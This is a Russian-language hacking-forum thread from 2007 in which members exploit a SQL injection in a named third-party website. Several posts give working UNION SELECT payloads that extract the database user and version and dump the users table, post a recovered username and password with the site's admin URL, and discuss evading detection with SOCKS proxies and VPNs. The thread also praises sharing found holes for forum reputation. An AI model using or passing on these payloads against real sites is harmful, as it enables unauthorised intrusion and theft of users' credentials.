 |
|
09.12.2007, 22:09
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами:
10393869
Репутация:
2032
|
|
http://www.f1links.com/list.php?id=62'
раскрутите скулю плз. у меня не получилось(
|
|
|
09.12.2007, 22:14
|
|
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
С нами:
10488959
Репутация:
474
|
|
Код:
http://www.f1links.com/list.php?id=62+UNION+SELECT+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),version(),database()),1),1)/*
|
|
|
|
09.12.2007, 22:17
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
Код:
http://www.f1links.com/list.php?id=-62+union+select+1,convert(count(*)+using+latin1)+from+users
4=\
Код:
http://www.f1links.com/list.php?id=-62+union+select+1,convert(concat(user,0x3a,pass)+using+latin1)+from+users+limit+0,1
david:bla
=
http://www.f1links.com/admin/
Have fun |
|
|
|
09.12.2007, 22:17
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
http://www.f1links.com/list.php?id=62+UNION+SELECT+1,aes_decrypt(aes_encr ypt(concat_ws(0x3a,user,pass),1),1)+from+users/*
qwerty
Слип цука =\
|
|
|
|
10.12.2007, 03:41
|
|
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
С нами:
9847919
Репутация:
1446
|
|
Только что нашел sql инъекцию, через которую можно слить мыла и пароли юзеров сайта, это уголовно наказуемо?) И как от этого уберечься? Соксы и VPN ?
|
|
|
|
10.12.2007, 03:45
|
|
Постоянный
Регистрация: 09.11.2006
Сообщений: 639
С нами:
10265091
Репутация:
541
|
|
тибя посодют, а ты неворуй!
да
да |
|
|
|
10.12.2007, 03:49
|
|
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
С нами:
9847919
Репутация:
1446
|
|
А просто запостить в раздел инъекций можно?
P.S. может кому-нибудь понадобится. 
Последний раз редактировалось Momiji; 10.12.2007 в 04:06..
|
|
|
|
10.12.2007, 08:01
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами:
10441826
Репутация:
1861
|
|
Сообщение от Momiji
А просто запостить в раздел инъекций можно?
P.S. может кому-нибудь понадобится. Не можно, а нужно =)...
Если ваша уязвимость на сайте понравится участникам форума, то вам за это даже репутацию повысят...
|
|
|
|
10.12.2007, 15:40
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами:
9762146
Репутация:
1174
|
|
Есть сайт вида
Код:
http://www.site.ru/11/15/
При подстановке одинарной кавычки
Код:
http://www.site.ru/11/15'/
Плюет :
Код:
Ошибка
Внутренняя ошибка
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') AND `id` IN (SELECT `nid` FROM `node__access` WHERE `r` = 1 AND `uid` IN (408' at line 1
И отсюда у меня 2 вопроса:
это инъект ?
если да, то какого вида должен быть запрос? |
|
|
|
10.12.2007, 15:44
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами:
11217866
Репутация:
3812
|
|
попробуй
http://www.site.ru/11/15+union+select+blablabla+from+hekbla--+/
__________________
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
